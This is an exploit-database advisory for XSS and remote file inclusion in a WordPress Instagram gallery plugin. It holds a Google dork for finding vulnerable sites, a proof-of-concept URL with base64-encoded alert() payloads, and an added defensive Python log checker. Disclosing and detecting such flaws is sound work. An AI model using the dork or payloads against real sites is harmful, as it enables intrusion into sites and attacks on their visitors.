
January 1, 2016
Mgl-instagram-gallery Xss

\# Exploit Title: WordPress Instagram Photo & Video Gallery Multiple Vulnerabilities
\# Google Dork: inurl:wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=
\# Date: 28/03/2016
\# Author: khan 404
\# Software Link: https://codecanyon.net/item/instagram-photo-video-gallery-wordpress/5281312
\# Version: v2
\# Category: webapps
\# CVE: NA
\# Tested on: XP, Firefox

Details:
WordPress Instagram Photo & Video Gallery is vulnerable to XSS and RFI.

Vulnerable file: /mgl-instagram-gallery/single-gallery.php

Vulnerable GET parameters:
media= is vulnerable to RFI and XSS
Title= is vulnerable to XSS

Information passed to these parameters must be base64 encoded.

POC:
wp-content/plugins/mgl-instagram-gallery/single-gallery.php?media=aHR0cHM6Ly9mYmNkbi1kcmFnb24tYS5ha2FtYWloZC5uZXQvaHBob3Rvcy1hay14cGExL3QzOS4yMzY1LTYvODUxNTY1XzYwMjI2OTk1NjQ3NDE4OF85MTg2Mzg5NzBfbi5wbmcib25sb2FkPSJhbGVydCgnWFNTJyk=&title=PHNjcmlwdD5hbGVydCgndGVzdCcpOzwvc2NyaXB0Pg==
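A defender-side check for the issue described above, as an added example that is not part of the original advisory or the plugin's code: it decodes the base64 `media` and `title` values found in access-log request targets for `single-gallery.php` and flags markup characters or a media URL outside an allow-list. The allow-list host, the function names and the sample targets are assumptions constructed for illustration.

```python
import base64
from urllib.parse import parse_qs, urlsplit

# Path and parameter names come from the advisory; the allow-list is an assumption.
PLUGIN_PATH = "/wp-content/plugins/mgl-instagram-gallery/single-gallery.php"
ALLOWED_MEDIA_HOSTS = {"example-cdn.test"}  # hypothetical trusted media host
MARKUP_CHARS = set("<>\"'`")

def decode_param(raw):
    """Decode a base64 query value; return None if it is not base64 text."""
    raw = raw.replace(" ", "+")      # parse_qs turns '+' into a space
    raw += "=" * (-len(raw) % 4)     # tolerate stripped padding
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8")
    except ValueError:               # covers binascii.Error and UnicodeDecodeError
        return None

def media_url_allowed(text):
    try:
        url = urlsplit(text)
    except ValueError:
        return False
    return url.scheme in ("http", "https") and url.hostname in ALLOWED_MEDIA_HOSTS

def review_request(target):
    """Return findings for one request target taken from an access log."""
    parts = urlsplit(target)
    if not parts.path.endswith(PLUGIN_PATH):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = []
    for name in ("media", "title"):
        for raw in params.get(name, []):
            text = decode_param(raw)
            if text is None:
                findings.append(f"{name}: not valid base64 text")
            elif MARKUP_CHARS & set(text):
                findings.append(f"{name}: decoded value contains markup characters")
            elif name == "media" and not media_url_allowed(text):
                findings.append(f"{name}: URL outside the media allow-list")
    return findings

def target(media, title_b64):  # build a constructed request target
    return f"{PLUGIN_PATH}?media={base64.b64encode(media.encode()).decode()}&title={title_b64}"

SAMPLES = [  # constructed; the second title value is the advisory's own PoC
    target("https://example-cdn.test/a.png", "U3Vuc2V0"),
    target("https://example-cdn.test/a.png", "PHNjcmlwdD5hbGVydCgndGVzdCcpOzwvc2NyaXB0Pg=="),
    target("http://other-host.test/x.txt", "U3Vuc2V0"),
]
```

The same decode-then-validate order applies on the server side: validate the decoded value, not the base64 string, and encode it for the HTML context before output.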
Nice one
Thanks :)